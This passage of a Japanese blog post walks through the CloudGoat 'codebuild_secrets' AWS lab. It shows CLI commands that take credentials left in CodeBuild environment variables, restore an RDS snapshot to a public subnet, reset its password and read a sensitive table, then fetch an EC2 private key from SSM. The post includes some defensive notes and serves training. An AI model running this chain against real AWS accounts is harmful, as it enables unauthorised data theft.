
AWSの攻撃体験ツール【Cloudgoat】全シナリオやる(後編)

前編、中編はこちら。

ctf4bba.hatenablog.com

ctf4bba.hatenablog.com

codebuild_secrets (Large / Hard)


このシナリオには二つのルートがある。
一つは、IAMユーザーSoloから始め、CodeBuildを調査してユーザーCalrissianの認証情報を入手し、CalrissianとしてRDSのスナップショットを利用するルート。もう一つは、SSMパラメータからインスタンスのSSHキーを取得し、メタデータを利用してインスタンスプロファイルのキーを取得して、隠された情報を得るルート。

初期情報は下記。

Outputs:

cloudgoat_output_aws_account_id = 7***********
cloudgoat_output_solo_access_key_id = A**************
cloudgoat_output_solo_secret_key = 1***************************

CodeBuildを調査する。

AWS CodeBuild のコマンドラインリファレンス - AWS CodeBuild


% aws codebuild list-projects --profile Solo --region us-east-1
{
    "projects": [
        "cg-codebuild-cgidysjfe61q7i"
    ]
}
% aws codebuild batch-get-projects --names cg-codebuild-cgidysjfe61q7i --profile Solo --region us-east-1
{
    "projects": [
        {
            "name": "cg-codebuild-cgidysjfe61q7i",
            "arn": "arn:aws:codebuild:us-east-1:7***********:project/cg-codebuild-cgidysjfe61q7i",
            "source": {
                "type": "NO_SOURCE",
                "gitCloneDepth": 0,
                "buildspec": "version: 0.2\n\nphases:\n  pre_build:\n    commands:\n      - echo \"This is CloudGoat's simpliest buildspec file ever (maybe)\"",
                "insecureSsl": false
            },
            "artifacts": {
                "type": "NO_ARTIFACTS",
                "overrideArtifactName": false
            },
            "cache": {
                "type": "NO_CACHE"
            },
            "environment": {
                "type": "LINUX_CONTAINER",
                "image": "aws/codebuild/standard:1.0",
                "computeType": "BUILD_GENERAL1_SMALL",
                "environmentVariables": [
                    {
                        "name": "calrissian-aws-access-key",
                        "value": "A**************",
                        "type": "PLAINTEXT"
                    },
                    {
                        "name": "calrissian-aws-secret-key",
                        "value": "n***************************",
                        "type": "PLAINTEXT"
                    }
                ],
                "privilegedMode": false,
                "imagePullCredentialsType": "CODEBUILD"
            },
            "serviceRole": "arn:aws:iam::7***********:role/code-build-cg-cgidysjfe61q7i-service-role",
            "timeoutInMinutes": 20,
            "queuedTimeoutInMinutes": 480,
            "encryptionKey": "arn:aws:kms:us-east-1:7***********:alias/aws/s3",
            "tags": [
                {
                    "key": "Name",
                    "value": "cg-codebuild-cgidysjfe61q7i"
                },
                {
                    "key": "Scenario",
                    "value": "codebuild-secrets"
                },
                {
                    "key": "Stack",
                    "value": "CloudGoat"
                }
            ],
            "created": "2021-01-07T13:41:45.738000+09:00",
            "lastModified": "2021-01-07T13:41:45.738000+09:00",
            "badge": {
                "badgeEnabled": false
            },
            "logsConfig": {
                "cloudWatchLogs": {
                    "status": "ENABLED"
                },
                "s3Logs": {
                    "status": "DISABLED",
                    "encryptionDisabled": false
                }
            }
        }
    ],
    "projectsNotFound": []
}

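このCodeBuildプロジェクトには、Calrissianのアクセスキーとシークレットキーが環境変数として平文（type: PLAINTEXT）で設定されており、batch-get-projectsを実行できるユーザーなら誰でも読める。これをプロファイルに登録して使う。本来こうした値はPARAMETER_STOREやSECRETS_MANAGERタイプで参照させ、プロジェクト定義に値そのものを残さないようにする。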

% aws configure --profile Calrissian
AWS Access Key ID [None]: A**************
AWS Secret Access Key [None]: n***************************
Default region name [None]: us-east-1
Default output format [None]: 

RDSの調査。

% aws rds describe-db-instances --profile Calrissian
{
    "DBInstances": [
        {
            "DBInstanceIdentifier": "cg-rds-instance-cgidysjfe61q7i",
            "DBInstanceClass": "db.t2.micro",
            "Engine": "postgres",
            "DBInstanceStatus": "available",
            "MasterUsername": "cgadmin",
            "DBName": "securedb",
            "Endpoint": {
                "Address": "cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com",
                "Port": 5432,
                "HostedZoneId": "Z2R2ITUGPM61AM"
            },
            "AllocatedStorage": 20,
            "InstanceCreateTime": "2021-01-07T04:45:19.334000+00:00",
            "PreferredBackupWindow": "07:38-08:08",
            "BackupRetentionPeriod": 0,
            "DBSecurityGroups": [],
            "VpcSecurityGroups": [
                {
                    "VpcSecurityGroupId": "sg-09e426a8cb9f31e8a",
                    "Status": "active"
                }
            ],
            "DBParameterGroups": [
                {
                    "DBParameterGroupName": "default.postgres9.6",
                    "ParameterApplyStatus": "in-sync"
                }
            ],
            "AvailabilityZone": "us-east-1b",
            "DBSubnetGroup": {
                "DBSubnetGroupName": "cloud-goat-rds-subnet-group-cgidysjfe61q7i",
                "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group",
                "VpcId": "vpc-0d54cc644cc046bf5",
                "SubnetGroupStatus": "Complete",
                "Subnets": [
                    {
                        "SubnetIdentifier": "subnet-0b887402790487154",
                        "SubnetAvailabilityZone": {
                            "Name": "us-east-1a"
                        },
                        "SubnetOutpost": {},
                        "SubnetStatus": "Active"
                    },
                    {
                        "SubnetIdentifier": "subnet-0207674e01d5abb99",
                        "SubnetAvailabilityZone": {
                            "Name": "us-east-1b"
                        },
                        "SubnetOutpost": {},
                        "SubnetStatus": "Active"
                    }
                ]
            },
(snip)
            "TagList": [
                {
                    "Key": "Name",
                    "Value": "cg-rds-instance-cgidysjfe61q7i"
                },
                {
                    "Key": "Scenario",
                    "Value": "codebuild-secrets"
                },
                {
                    "Key": "Stack",
                    "Value": "CloudGoat"
                }
            ]
        }
    ]
}

元のインスタンスのスナップショットを取得し、それを外部からアクセス可能なサブネットにリストアして、リストアしたインスタンスへ接続することを目指す。（後のリストアで指定するスナップショットsnapshot1の作成コマンドは、この記事では省略されている。）

上記インスタンスはprivateと思われるサブネットグループに属しており、それとは別にpublicと思われるサブネットグループがあることがわかる。
(private／publicの判断は、サブネットグループの説明とsubnetのNameタグからの推測)
subnetの情報を見るコマンド（ec2 describe-subnets）は、Calrissianではなく、Soloの権限で実行する必要がある。

% aws rds describe-db-subnet-groups --profile Calrissian 
{
    "DBSubnetGroups": [
        {
            "DBSubnetGroupName": "cloud-goat-rds-subnet-group-cgidysjfe61q7i",
            "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group",
            "VpcId": "vpc-0d54cc644cc046bf5",
            "SubnetGroupStatus": "Complete",
            "Subnets": [
                {
                    "SubnetIdentifier": "subnet-0b887402790487154",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1a"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-0207674e01d5abb99",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1b"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                }
            ],
            "DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:cloud-goat-rds-subnet-group-cgidysjfe61q7i"
        },
        {
            "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i",
            "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets",
            "VpcId": "vpc-0d54cc644cc046bf5",
            "SubnetGroupStatus": "Complete",
            "Subnets": [
                {
                    "SubnetIdentifier": "subnet-0ff83f3eceab80bba",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1b"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-04e2754b6ac56dabe",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1a"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                }
            ],
            "DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i"
        },
        {
            "DBSubnetGroupName": "default",
            "DBSubnetGroupDescription": "default",
            "VpcId": "vpc-116d946c",
            "SubnetGroupStatus": "Complete",
            "Subnets": [
                {
                    "SubnetIdentifier": "subnet-24a40d7b",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1d"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-2d6fc40c",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1b"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-6316e652",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1e"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-5c03ae3a",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1a"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-0d640203",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1f"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-e5502ca8",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1c"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                }
            ],
            "DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:default"
        }
    ]
}
% aws ec2 describe-subnets --profile Solo --region us-east-1
{
    "Subnets": [
        {
            "AvailabilityZone": "us-east-1c",
            "AvailabilityZoneId": "use1-az4",
            "AvailableIpAddressCount": 4091,
            "CidrBlock": "172.31.16.0/20",
            "DefaultForAz": true,
            "MapPublicIpOnLaunch": true,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-e5502ca8",
            "VpcId": "vpc-116d946c",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-e5502ca8"
        },
        {
            "AvailabilityZone": "us-east-1f",
            "AvailabilityZoneId": "use1-az5",
            "AvailableIpAddressCount": 4091,
            "CidrBlock": "172.31.64.0/20",
            "DefaultForAz": true,
            "MapPublicIpOnLaunch": true,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-0d640203",
            "VpcId": "vpc-116d946c",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0d640203"
        },
        {
            "AvailabilityZone": "us-east-1a",
            "AvailabilityZoneId": "use1-az1",
            "AvailableIpAddressCount": 4091,
            "CidrBlock": "172.31.0.0/20",
            "DefaultForAz": true,
            "MapPublicIpOnLaunch": true,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-5c03ae3a",
            "VpcId": "vpc-116d946c",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-5c03ae3a"
        },
        {
            "AvailabilityZone": "us-east-1a",
            "AvailabilityZoneId": "use1-az1",
            "AvailableIpAddressCount": 250,
            "CidrBlock": "10.10.10.0/24",
            "DefaultForAz": false,
            "MapPublicIpOnLaunch": false,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-04e2754b6ac56dabe",
            "VpcId": "vpc-0d54cc644cc046bf5",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "Tags": [
                {
                    "Key": "Stack",
                    "Value": "CloudGoat"
                },
                {
                    "Key": "Name",
                    "Value": "CloudGoat cgidysjfe61q7i Public Subnet #1"
                },
                {
                    "Key": "Scenario",
                    "Value": "codebuild-secrets"
                }
            ],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-04e2754b6ac56dabe"
        },
        {
            "AvailabilityZone": "us-east-1e",
            "AvailabilityZoneId": "use1-az3",
            "AvailableIpAddressCount": 4091,
            "CidrBlock": "172.31.48.0/20",
            "DefaultForAz": true,
            "MapPublicIpOnLaunch": true,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-6316e652",
            "VpcId": "vpc-116d946c",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-6316e652"
        },
        {
            "AvailabilityZone": "us-east-1a",
            "AvailabilityZoneId": "use1-az1",
            "AvailableIpAddressCount": 251,
            "CidrBlock": "10.10.30.0/24",
            "DefaultForAz": false,
            "MapPublicIpOnLaunch": false,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-0b887402790487154",
            "VpcId": "vpc-0d54cc644cc046bf5",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "Tags": [
                {
                    "Key": "Stack",
                    "Value": "CloudGoat"
                },
                {
                    "Key": "Name",
                    "Value": "CloudGoat cgidysjfe61q7i Private Subnet #1"
                },
                {
                    "Key": "Scenario",
                    "Value": "codebuild-secrets"
                }
            ],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0b887402790487154"
        },
        {
            "AvailabilityZone": "us-east-1b",
            "AvailabilityZoneId": "use1-az2",
            "AvailableIpAddressCount": 250,
            "CidrBlock": "10.10.40.0/24",
            "DefaultForAz": false,
            "MapPublicIpOnLaunch": false,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-0207674e01d5abb99",
            "VpcId": "vpc-0d54cc644cc046bf5",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "Tags": [
                {
                    "Key": "Stack",
                    "Value": "CloudGoat"
                },
                {
                    "Key": "Name",
                    "Value": "CloudGoat cgidysjfe61q7i Private Subnet #2"
                },
                {
                    "Key": "Scenario",
                    "Value": "codebuild-secrets"
                }
            ],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0207674e01d5abb99"
        },
        {
            "AvailabilityZone": "us-east-1b",
            "AvailabilityZoneId": "use1-az2",
            "AvailableIpAddressCount": 250,
            "CidrBlock": "10.10.20.0/24",
            "DefaultForAz": false,
            "MapPublicIpOnLaunch": false,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-0ff83f3eceab80bba",
            "VpcId": "vpc-0d54cc644cc046bf5",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "CloudGoat cgidysjfe61q7i Public Subnet #2"
                },
                {
                    "Key": "Scenario",
                    "Value": "codebuild-secrets"
                },
                {
                    "Key": "Stack",
                    "Value": "CloudGoat"
                }
            ],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0ff83f3eceab80bba"
        },
        {
            "AvailabilityZone": "us-east-1b",
            "AvailabilityZoneId": "use1-az2",
            "AvailableIpAddressCount": 4091,
            "CidrBlock": "172.31.80.0/20",
            "DefaultForAz": true,
            "MapPublicIpOnLaunch": true,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-2d6fc40c",
            "VpcId": "vpc-116d946c",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-2d6fc40c"
        },
        {
            "AvailabilityZone": "us-east-1d",
            "AvailabilityZoneId": "use1-az6",
            "AvailableIpAddressCount": 4091,
            "CidrBlock": "172.31.32.0/20",
            "DefaultForAz": true,
            "MapPublicIpOnLaunch": true,
            "MapCustomerOwnedIpOnLaunch": false,
            "State": "available",
            "SubnetId": "subnet-24a40d7b",
            "VpcId": "vpc-116d946c",
            "OwnerId": "7***********",
            "AssignIpv6AddressOnCreation": false,
            "Ipv6CidrBlockAssociationSet": [],
            "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-24a40d7b"
        }
    ]
}

publicなサブネットグループにDBをリストアする。

% aws rds restore-db-instance-from-db-snapshot --db-instance-identifier newinstance1 --db-snapshot-identifier snapshot1 --db-subnet-group-name cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i --publicly-accessible --profile Calrissian
{
    "DBInstance": {
        "DBInstanceIdentifier": "newinstance1",
        "DBInstanceClass": "db.t2.micro",
        "Engine": "postgres",
        "DBInstanceStatus": "creating",
        "MasterUsername": "cgadmin",
        "DBName": "securedb",
        "AllocatedStorage": 20,
        "PreferredBackupWindow": "07:38-08:08",
        "BackupRetentionPeriod": 0,
        "DBSecurityGroups": [],
        "VpcSecurityGroups": [
            {
                "VpcSecurityGroupId": "sg-0097b2cef3e219411",
                "Status": "active"
            }
        ],
        "DBParameterGroups": [
            {
                "DBParameterGroupName": "default.postgres9.6",
                "ParameterApplyStatus": "in-sync"
            }
        ],
        "DBSubnetGroup": {
            "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i",
            "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets",
            "VpcId": "vpc-0d54cc644cc046bf5",
            "SubnetGroupStatus": "Complete",
            "Subnets": [
                {
                    "SubnetIdentifier": "subnet-0ff83f3eceab80bba",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1b"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-04e2754b6ac56dabe",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1a"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                }
            ]
        },
        "PreferredMaintenanceWindow": "mon:04:03-mon:04:33",
        "PendingModifiedValues": {},
        "MultiAZ": false,
        "EngineVersion": "9.6.19",
        "AutoMinorVersionUpgrade": true,
        "ReadReplicaDBInstanceIdentifiers": [],
        "LicenseModel": "postgresql-license",
        "OptionGroupMemberships": [
            {
                "OptionGroupName": "default:postgres-9-6",
                "Status": "pending-apply"
            }
        ],
        "PubliclyAccessible": true,
        "StorageType": "gp2",
        "DbInstancePort": 0,
        "StorageEncrypted": false,
        "DbiResourceId": "db-5MMRXQLGIES4ZGGKRQSEBHLR3Q",
        "CACertificateIdentifier": "rds-ca-2019",
        "DomainMemberships": [],
        "CopyTagsToSnapshot": false,
        "MonitoringInterval": 0,
        "DBInstanceArn": "arn:aws:rds:us-east-1:7***********:db:newinstance1",
        "IAMDatabaseAuthenticationEnabled": false,
        "PerformanceInsightsEnabled": false,
        "DeletionProtection": false,
        "AssociatedRoles": [],
        "TagList": [
            {
                "Key": "Name",
                "Value": "cg-rds-instance-cgidysjfe61q7i"
            },
            {
                "Key": "Scenario",
                "Value": "codebuild-secrets"
            },
            {
                "Key": "Stack",
                "Value": "CloudGoat"
            }
        ]
    }
}

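リストアしたDBにはVPCのデフォルトセキュリティグループ(sg-0097b2cef3e219411)が適用される。このグループのインバウンドは同じグループからの通信しか許可していないため、セキュリティグループを付け替える。
5432/tcpを特定の送信元IP(/32)とVPC内サブネットに許可しているcg-rds-psql-cgidysjfe61q7i(sg-09e426a8cb9f31e8a)にすればよさそう。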

% aws ec2 describe-security-groups --profile Calrissian 
{
    "SecurityGroups": [
        {
            "Description": "default VPC security group",
            "GroupName": "default",
            "IpPermissions": [
                {
                    "IpProtocol": "-1",
                    "IpRanges": [],
                    "Ipv6Ranges": [],
                    "PrefixListIds": [],
                    "UserIdGroupPairs": [
                        {
                            "GroupId": "sg-0097b2cef3e219411",
                            "UserId": "7***********"
                        }
                    ]
                }
            ],
            "OwnerId": "7***********",
            "GroupId": "sg-0097b2cef3e219411",
            "IpPermissionsEgress": [
                {
                    "IpProtocol": "-1",
                    "IpRanges": [
                        {
                            "CidrIp": "0.0.0.0/0"
                        }
                    ],
                    "Ipv6Ranges": [],
                    "PrefixListIds": [],
                    "UserIdGroupPairs": []
                }
            ],
            "VpcId": "vpc-0d54cc644cc046bf5"
        },
        {
            "Description": "CloudGoat cgidysjfe61q7i Security Group for EC2 Instance over SSH",
            "GroupName": "cg-ec2-ssh-cgidysjfe61q7i",
            "IpPermissions": [
                {
                    "FromPort": 22,
                    "IpProtocol": "tcp",
                    "IpRanges": [
                        {
                            "CidrIp": "**.**.**.**/32"
                        }
                    ],
                    "Ipv6Ranges": [],
                    "PrefixListIds": [],
                    "ToPort": 22,
                    "UserIdGroupPairs": []
                }
            ],
            "OwnerId": "7***********",
            "GroupId": "sg-07844914cbfefc7ce",
            "IpPermissionsEgress": [
                {
                    "IpProtocol": "-1",
                    "IpRanges": [
                        {
                            "CidrIp": "0.0.0.0/0"
                        }
                    ],
                    "Ipv6Ranges": [],
                    "PrefixListIds": [],
                    "UserIdGroupPairs": []
                }
            ],
            "Tags": [
                {
                    "Key": "Stack",
                    "Value": "CloudGoat"
                },
                {
                    "Key": "Scenario",
                    "Value": "codebuild-secrets"
                },
                {
                    "Key": "Name",
                    "Value": "cg-ec2-ssh-cgidysjfe61q7i"
                }
            ],
            "VpcId": "vpc-0d54cc644cc046bf5"
        },
        {
            "Description": "CloudGoat cgidysjfe61q7i Security Group for PostgreSQL RDS Instance",
            "GroupName": "cg-rds-psql-cgidysjfe61q7i",
            "IpPermissions": [
                {
                    "FromPort": 5432,
                    "IpProtocol": "tcp",
                    "IpRanges": [
                        {
                            "CidrIp": "10.10.20.0/24"
                        },
                        {
                            "CidrIp": "10.10.30.0/24"
                        },
                        {
                            "CidrIp": "10.10.40.0/24"
                        },
                        {
                            "CidrIp": "**.**.**.**/32"
                        },
                        {
                            "CidrIp": "10.10.10.0/24"
                        }
                    ],
                    "Ipv6Ranges": [],
                    "PrefixListIds": [],
                    "ToPort": 5432,
                    "UserIdGroupPairs": []
                }
            ],
            "OwnerId": "7***********",
            "GroupId": "sg-09e426a8cb9f31e8a",
            "IpPermissionsEgress": [
                {
                    "IpProtocol": "-1",
                    "IpRanges": [
                        {
                            "CidrIp": "0.0.0.0/0"
                        }
                    ],
                    "Ipv6Ranges": [],
                    "PrefixListIds": [],
                    "UserIdGroupPairs": []
                }
            ],
            "VpcId": "vpc-0d54cc644cc046bf5"
        },
        {
            "Description": "default VPC security group",
            "GroupName": "default",
            "IpPermissions": [
                {
                    "IpProtocol": "-1",
                    "IpRanges": [],
                    "Ipv6Ranges": [],
                    "PrefixListIds": [],
                    "UserIdGroupPairs": [
                        {
                            "GroupId": "sg-0d531a31",
                            "UserId": "7***********"
                        }
                    ]
                }
            ],
            "OwnerId": "7***********",
            "GroupId": "sg-0d531a31",
            "IpPermissionsEgress": [
                {
                    "IpProtocol": "-1",
                    "IpRanges": [
                        {
                            "CidrIp": "0.0.0.0/0"
                        }
                    ],
                    "Ipv6Ranges": [],
                    "PrefixListIds": [],
                    "UserIdGroupPairs": []
                }
            ],
            "VpcId": "vpc-116d946c"
        }
    ]
}
% aws rds modify-db-instance --db-instance-identifier newinstance1 --vpc-security-group-ids sg-09e426a8cb9f31e8a --profile Calrissian
{
    "DBInstance": {
        "DBInstanceIdentifier": "newinstance1",
        "DBInstanceClass": "db.t2.micro",
        "Engine": "postgres",
        "DBInstanceStatus": "available",
        "MasterUsername": "cgadmin",
        "DBName": "securedb",
        "Endpoint": {
            "Address": "newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com",
            "Port": 5432,
            "HostedZoneId": "Z2R2ITUGPM61AM"
        },
        "AllocatedStorage": 20,
        "InstanceCreateTime": "2021-01-14T03:13:42.402000+00:00",
        "PreferredBackupWindow": "07:38-08:08",
        "BackupRetentionPeriod": 0,
        "DBSecurityGroups": [],
        "VpcSecurityGroups": [
            {
                "VpcSecurityGroupId": "sg-09e426a8cb9f31e8a",
                "Status": "adding"
            },
            {
                "VpcSecurityGroupId": "sg-0097b2cef3e219411",
                "Status": "removing"
            }
        ],
        "DBParameterGroups": [
            {
                "DBParameterGroupName": "default.postgres9.6",
                "ParameterApplyStatus": "in-sync"
            }
        ],
        "AvailabilityZone": "us-east-1b",
        "DBSubnetGroup": {
            "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i",
            "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets",
            "VpcId": "vpc-0d54cc644cc046bf5",
            "SubnetGroupStatus": "Complete",
            "Subnets": [
                {
                    "SubnetIdentifier": "subnet-0ff83f3eceab80bba",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1b"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-04e2754b6ac56dabe",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1a"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                }
            ]
        },
(snip)
        "TagList": [
            {
                "Key": "Name",
                "Value": "cg-rds-instance-cgidysjfe61q7i"
            },
            {
                "Key": "Scenario",
                "Value": "codebuild-secrets"
            },
            {
                "Key": "Stack",
                "Value": "CloudGoat"
            }
        ]
    }
}

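さらに、リストアしたインスタンスは元のマスターパスワード（不明）を引き継いでいるため、マスターパスワードを既知の値に変更する。modify-db-instanceは現在のパスワードを知らなくても再設定できる。防御側から見ると、RestoreDBInstanceFromDBSnapshotに続くModifyDBInstance（セキュリティグループ変更やパスワード再設定）はCloudTrailで監視すべき一連の操作になる。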

% aws rds modify-db-instance --db-instance-identifier newinstance1 --master-user-password cgpassword --profile Calrissian
{
    "DBInstance": {
        "DBInstanceIdentifier": "newinstance1",
        "DBInstanceClass": "db.t2.micro",
        "Engine": "postgres",
        "DBInstanceStatus": "available",
        "MasterUsername": "cgadmin",
        "DBName": "securedb",
        "Endpoint": {
            "Address": "newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com",
            "Port": 5432,
            "HostedZoneId": "Z2R2ITUGPM61AM"
        },
        "AllocatedStorage": 20,
        "InstanceCreateTime": "2021-01-14T03:13:42.402000+00:00",
        "PreferredBackupWindow": "07:38-08:08",
        "BackupRetentionPeriod": 0,
        "DBSecurityGroups": [],
        "VpcSecurityGroups": [
            {
                "VpcSecurityGroupId": "sg-09e426a8cb9f31e8a",
                "Status": "active"
            }
        ],
        "DBParameterGroups": [
            {
                "DBParameterGroupName": "default.postgres9.6",
                "ParameterApplyStatus": "in-sync"
            }
        ],
        "AvailabilityZone": "us-east-1b",
        "DBSubnetGroup": {
            "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i",
            "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets",
            "VpcId": "vpc-0d54cc644cc046bf5",
            "SubnetGroupStatus": "Complete",
            "Subnets": [
                {
                    "SubnetIdentifier": "subnet-0ff83f3eceab80bba",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1b"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                },
                {
                    "SubnetIdentifier": "subnet-04e2754b6ac56dabe",
                    "SubnetAvailabilityZone": {
                        "Name": "us-east-1a"
                    },
                    "SubnetOutpost": {},
                    "SubnetStatus": "Active"
                }
            ]
        },
(snip)
        "TagList": [
            {
                "Key": "Name",
                "Value": "cg-rds-instance-cgidysjfe61q7i"
            },
            {
                "Key": "Scenario",
                "Value": "codebuild-secrets"
            },
            {
                "Key": "Stack",
                "Value": "CloudGoat"
            }
        ]
    }
}

これでDBに外部から接続可能になったので、接続して情報を窃取するとゴール。防御側から見ると、見覚えのないインスタンスに対するModifyDBInstance(マスターパスワードの変更)がCloudTrailに残るので、これが検知の手がかりになる。

% psql postgresql://cgadmin:cgpassword@newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb
psql (13.1, server 9.6.19)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type "help" for help.

securedb=> \dt
                List of relations
 Schema |         Name          | Type  |  Owner  
--------+-----------------------+-------+---------
 public | sensitive_information | table | cgadmin
(1 row)

securedb=> select * from sensitive_information;
 name |                   value                    
------+--------------------------------------------
 Key1 | V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4
 Key2 | V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6
(2 rows)



次に、別ルートを試す。

まず、SSMパラメータを取得すると、鍵の情報が入手できる。

% aws ssm describe-parameters --profile Solo --region us-east-1
{
    "Parameters": [
        {
            "Name": "cg-ec2-private-key-cgidysjfe61q7i",
            "Type": "String",
            "LastModifiedDate": "2021-01-07T13:41:31.423000+09:00",
            "LastModifiedUser": "arn:aws:iam::7***********:user/cloudgoat",
            "Description": "cg-ec2-private-key-cgidysjfe61q7i",
            "Version": 1,
            "Tier": "Standard",
            "Policies": [],
            "DataType": "text"
        },
        {
            "Name": "cg-ec2-public-key-cgidysjfe61q7i",
            "Type": "String",
            "LastModifiedDate": "2021-01-07T13:41:31.263000+09:00",
            "LastModifiedUser": "arn:aws:iam::7***********:user/cloudgoat",
            "Description": "cg-ec2-public-key-cgidysjfe61q7i",
            "Version": 1,
            "Tier": "Standard",
            "Policies": [],
            "DataType": "text"
        }
    ]
}
% aws ssm get-parameter --name cg-ec2-private-key-cgidysjfe61q7i --profile Solo --region us-east-1
{
    "Parameter": {
        "Name": "cg-ec2-private-key-cgidysjfe61q7i",
        "Type": "String",
        "Value": "(snip)",
        "Version": 1,
        "LastModifiedDate": "2021-01-07T13:41:31.423000+09:00",
